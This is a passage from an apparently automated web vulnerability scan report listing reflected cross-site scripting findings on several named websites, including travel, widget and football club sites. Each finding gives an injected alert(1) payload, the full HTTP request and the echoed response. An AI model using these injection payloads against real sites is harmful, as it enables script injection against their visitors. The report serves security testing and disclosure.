Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 02 Oct 2011 23:46:02 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 80289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
tal;
google_safe = 'high';
google_ad_type = 'text';
google_color_line = 'ffffff';
google_adtest = 'off';
google_hints = 'Hotels Bostond123a';alert(1)//08fa278eb24';
google_encoding = 'iso-8859-1';
google_ad_channel = '2896345880';
}
function createGoogleAdsLink(pGoogleAdsVars) {
var oLink = document.creat
...[SNIP]...
4.334. http://www.igougo.com/traveldeals/ratefinder.aspx [endDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the endDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4645f"style%3d"x%3aexpression(alert(1))"0e074ed26d1 was submitted in the endDate parameter. This input was echoed as 4645f"style="x:expression(alert(1))"0e074ed26d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/20114645f"style%3d"x%3aexpression(alert(1))"0e074ed26d1 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:36:09 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston, undefined undefined&strtDate=10/04/2011&endDate=10/07/20114645f"style="x:expression(alert(1))"0e074ed26d1" />
...[SNIP]...
4.335. http://www.igougo.com/traveldeals/ratefinder.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 848f0"style%3d"x%3aexpression(alert(1))"b28791311ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 848f0"style="x:expression(alert(1))"b28791311ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011&848f0"style%3d"x%3aexpression(alert(1))"b28791311ee=1 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:52:45 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston, undefined undefined&strtDate=10/04/2011&endDate=10/07/2011&848f0"style="x:expression(alert(1))"b28791311ee=1" />
...[SNIP]...
4.336. http://www.igougo.com/traveldeals/ratefinder.aspx [rm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the rm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49a27"style%3d"x%3aexpression(alert(1))"5516cdaaee2 was submitted in the rm parameter. This input was echoed as 49a27"style="x:expression(alert(1))"5516cdaaee2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=149a27"style%3d"x%3aexpression(alert(1))"5516cdaaee2&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:33:14 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=149a27"style="x:expression(alert(1))"5516cdaaee2&dest=Boston, undefined undefined&strtDate=10/04/2011&endDate=10/07/2011" />
...[SNIP]...
4.337. http://www.igougo.com/traveldeals/ratefinder.aspx [strtDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the strtDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40323"style%3d"x%3aexpression(alert(1))"4d993816bbe was submitted in the strtDate parameter. This input was echoed as 40323"style="x:expression(alert(1))"4d993816bbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/201140323"style%3d"x%3aexpression(alert(1))"4d993816bbe&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:50:43 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston, undefined undefined&strtDate=10/04/201140323"style="x:expression(alert(1))"4d993816bbe&endDate=10/07/2011" />
...[SNIP]...
4.338. http://www.jscache.com/weimg [itype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jscache.com
Path:   /weimg

Issue detail

The value of the itype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c224c'%3balert(1)//00a1bd292f3 was submitted in the itype parameter. This input was echoed as c224c';alert(1)//00a1bd292f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weimg?itype=langs/en/tripadvisor_logo_207x51-12811-0.gifc224c'%3balert(1)//00a1bd292f3&lang=en HTTP/1.1
Host: www.jscache.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 193
Content-Type: application/x-javascript;charset=UTF-8
Expires: Mon, 03 Oct 2011 00:38:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:38:47 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:47 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.BC649BA2FF72A3D5B3A8EB2418B261B6*SQ.15*LS.weimg*GR.43*TCPAR.79*TBR.64*EXEX.37*ABTR.55*PPRP.72*PHTB.89*FS.52*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.3*DF.0*FP.%2Fweimg%3Flang%3Den%26itype%3Dlangs%252Fen%252Ftripadvisor_logo_207x51-12811-0%5C.gif*RP.http%3A%2F%2Fwww%5C.getaroom%5C.com%2F*LP.%2Fweimg%3Flang%3Den%26itype%3Dlangs%252Fen%252Ftripadvisor_logo_207x51-12811-0%5C.gif*FS.32*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=A; Domain=.tripadvisor.com; Path=/

document.write( '<img src="http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gifc224c';alert(1)//00a1bd292f3" style="border:none; margin:0;" alt=" TripAdvisor"/>' );
4.339. http://www.luminate.com/widget/v3/53d1ac1014/event/1230a958301-1/taskbar/minimized/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.luminate.com
Path:   /widget/v3/53d1ac1014/event/1230a958301-1/taskbar/minimized/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8f20f<script>alert(1)</script>9c80d39f6d9 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/v3/53d1ac1014/event/1230a958301-1/taskbar/minimized/?callback=jQuery152021032119542360306_13175999542938f20f<script>alert(1)</script>9c80d39f6d9&config_id=fdc910141b&mid=pJOb9VieN0ruJlEHp5PmCA&_=1317599964039 HTTP/1.1
Host: www.luminate.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: shoptube_id=f6d10bcb0c

Response

HTTP/1.0 200 OK
Date: Mon, 03 Oct 2011 00:00:51 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVa PSAa PSDa OUR OTR IND OTC"
Content-Type: application/javascript
Cache-Control: no-cache, no-store, private
Vary: Accept-Encoding
X-Cache: MISS from lb4-sv.int.pixazza.com
X-Cache-Lookup: MISS from lb4-sv.int.pixazza.com:80
Via: 1.0 lb4-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: Keep-Alive

jQuery152021032119542360306_13175999542938f20f<script>alert(1)</script>9c80d39f6d9({"result": "success"});
4.340. http://www.luminate.com/widget/v3/metadata/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.luminate.com
Path:   /widget/v3/metadata/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 454e8<script>alert(1)</script>680fca9efa2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/v3/metadata/?callback=$lmn8_metadata1454e8<script>alert(1)</script>680fca9efa2&width=570&height=355&idx=1&url=http%3A%2F%2Fu.goal.com%2F136200%2F136214hp2.jpg&publisher_id=53d1ac1014&title=Sir+Alex+and+Anderson-Manchester+United&modules=taskbar%2Cemail%2Cfacebook%2Ctwitter%2Cburma%2Cflipstats%2Cproducts&_cc=US HTTP/1.1
Host: www.luminate.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: shoptube_id=f6d10bcb0c

Response

HTTP/1.0 200 OK
Date: Mon, 03 Oct 2011 00:00:59 GMT
Server: Apache
Cache-Control: max-age=1800
Expires: Mon, 03 Oct 2011 00:30:59 GMT
X-Pixazza-Pict-ID: 1230a958301
X-Pixazza-Campaign-ID: 99ab10c867
X-Pixazza-Shopped: false
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVa PSAa PSDa OUR OTR IND OTC"
Content-Type: application/javascript
Vary: Accept-Encoding
X-Cache: MISS from lb1-sv.int.pixazza.com
X-Cache-Lookup: MISS from lb1-sv.int.pixazza.com:80
Via: 1.0 lb1-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: Keep-Alive

$lmn8_metadata1454e8<script>alert(1)</script>680fca9efa2({"data": {"burma": {"metadata": {"hints": "soccer sports football", "channelID": "1000000476", "network": "adsense", "accountID": "2540be4033"}}, "twitter": {"metadata": {}}, "flipstats": {"metadata":
...[SNIP]...
4.341. http://www.luminate.com/widget/v3/metadata/ [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.luminate.com
Path:   /widget/v3/metadata/

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload f0346<script>alert(1)</script>38991e8f777 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/v3/metadata/?callback=$lmn8_metadata1&width=570&height=355&idx=1&url=http%3A%2F%2Fu.goal.com%2F136200%2F136214hp2.jpgf0346<script>alert(1)</script>38991e8f777&publisher_id=53d1ac1014&title=Sir+Alex+and+Anderson-Manchester+United&modules=taskbar%2Cemail%2Cfacebook%2Ctwitter%2Cburma%2Cflipstats%2Cproducts&_cc=US HTTP/1.1
Host: www.luminate.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: shoptube_id=f6d10bcb0c

Response

HTTP/1.0 200 OK
Date: Mon, 03 Oct 2011 00:01:04 GMT
Server: Apache
Cache-Control: max-age=1800
Expires: Mon, 03 Oct 2011 00:31:04 GMT
X-Pixazza-Campaign-ID: 99ab10c867
X-Pixazza-Shopped: false
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVa PSAa PSDa OUR OTR IND OTC"
Content-Type: application/javascript
Vary: Accept-Encoding
X-Cache: MISS from lb5-sv.int.pixazza.com
X-Cache-Lookup: MISS from lb5-sv.int.pixazza.com:80
Via: 1.0 lb5-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: Keep-Alive

$lmn8_metadata1({"data": {"burma": {"metadata": {"accountID": "2540be4033", "channelID": "1000000476", "network": "adsense", "hints": "soccer sports football"}}, "products": {"metadata": {"data": {"targets": []}}}, "twitter": {"metadata": {}}, "image": {"uid": "-3b9b3273-1", "idx": 1, "title": "Sir Alex and Anderson-Manchester United", "url": "http://u.goal.com/136200/136214hp2.jpgf0346<script>alert(1)</script>38991e8f777", "celebrities": [], "mid": "S8RL5TZZ.FoRMxSnMY3wHC", "height": 355, "width": 570, "canonical": "http://u.goal.com/136200/136214hp2.jpgf0346<script>
...[SNIP]...
4.342. http://www.manutd.com/One-United/Login.aspx [redirectPath parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /One-United/Login.aspx

Issue detail

The value of the redirectPath request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d6e4"><script>alert(1)</script>e66d79da26b was submitted in the redirectPath parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}4d6e4"><script>alert(1)</script>e66d79da26b&regmode=full HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.8.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; ASP.NET_SessionId=dsijc245bi5upj3uvvwiumrc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 22140
Expires: Mon, 03 Oct 2011 00:01:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:01:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a href="/One-United/Forgot-Password.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}4d6e4"><script>alert(1)</script>e66d79da26b"
title="Forgotten your password?">
...[SNIP]...
4.343. http://www.manutd.com/Search-Results.aspx [catTxt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /Search-Results.aspx

Issue detail

The value of the catTxt request parameter is copied into the HTML document as plain text between tags. The payload a3be1<script>alert(1)</script>778a94ec988 was submitted in the catTxt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search-Results.aspx?qs=manutd_frontend&catTxt=a3be1<script>alert(1)</script>778a94ec988&searchText=xss HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/One-United.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.4.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 18384
Cache-Control: public, max-age=600
Date: Sun, 02 Oct 2011 23:55:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<strong>&nbsp;a3be1<script>alert(1)</script>778a94ec988&nbsp;|&nbsp;xss</strong>
...[SNIP]...
4.344. http://www.manutd.com/Search-Results.aspx [searchText parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /Search-Results.aspx

Issue detail

The value of the searchText request parameter is copied into the HTML document as plain text between tags. The payload 75931<script>alert(1)</script>14fb8fbf954 was submitted in the searchText parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931<script>alert(1)</script>14fb8fbf954 HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/One-United.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.4.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 18440
Cache-Control: public, max-age=600
Date: Sun, 02 Oct 2011 23:55:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<strong>&nbsp;All&nbsp;|&nbsp;xss75931<script>alert(1)</script>14fb8fbf954</strong>
...[SNIP]...
4.345. http://www.mufoundation.org/Search.aspx [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mufoundation.org
Path:   /Search.aspx

Issue detail

The value of the search request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5ea6"%3balert(1)//9b951a12e8a was submitted in the search parameter. This input was echoed as b5ea6";alert(1)//9b951a12e8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Search.aspx?search=bond%20interest%20eurob5ea6"%3balert(1)//9b951a12e8a HTTP/1.1
Host: www.mufoundation.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mufoundation.org/en/Charities.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CP=null*; __utma=1.1494158951.1317599905.1317599905.1317599905.1; __utmb=1.4.10.1317599905; __utmc=1; __utmz=1.1317599905.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: WEB-P02
Vary: Accept-Encoding
